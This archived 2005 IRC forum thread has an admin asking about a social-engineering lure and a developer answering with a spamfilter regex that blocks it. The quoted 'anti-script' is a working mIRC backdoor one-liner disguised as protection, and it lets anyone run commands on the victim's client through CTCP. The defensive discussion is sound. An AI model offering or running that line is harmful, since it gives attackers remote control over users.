recent mirc idiotic crap

These are old archives. They are kept for historic purposes only.
Post Reply
xirian

recent mirc idiotic crap

Post by xirian » Fri Jun 17, 2005 4:17 pm

lately my users have been getting alot of this:
(11:53:19) <+Viper007Bond> [Fri 08:49:05] <kairi> Have you heard about the irc control script?
(11:53:19) <+Viper007Bond> [Fri 08:49:22] <kairi> People can control what people say
(11:53:19) <+Viper007Bond> [Fri 08:49:39] <Viper007Bond> huh?
(11:53:19) <+Viper007Bond> [Fri 08:49:56] <kairi> Yeah it was on the news
(11:53:23) <+Viper007Bond> [Fri 08:50:29] <kairi> People can make people say stuff unless you type an anti script
(11:53:23) <+Viper007Bond> [Fri 08:50:47] <Viper007Bond> what's the anti-script?
(11:53:23) <+Viper007Bond> [Fri 08:51:27] <kairi> this is it //me :-) | write -c x ctcp 1:*:?:$1- | //me : | .load -rs x if you were vunrable it would say ctcp deactivated

whats an easy way to block the script line? And does anyone have any real idea what this does?

Syzop
UnrealIRCd head coder
Posts: 1957
Joined: Sat Mar 06, 2004 8:57 pm
Location: .nl
Contact:

Post by Syzop » Fri Jun 17, 2005 4:33 pm

This is quite a 'general' filter, but it should work (very?) well:

Code: Select all

/spamfilter add p block - mirc_trojan_attempt //.*write.*\.load
Basically, it hunts for '//', then for 'write', and then for '.load', if all of these 3 elements are present (after each other), then it blocks the message.
Although there are other techniques, these probably match many of these "trojans"/"exploits".
And does anyone have any real idea what this does?
It allows anyone to control the user (execute any command) via CTCP.

xirian

Post by xirian » Fri Jun 17, 2005 4:55 pm

thanks for the quick reply, hopefully this'll get them :)

Post Reply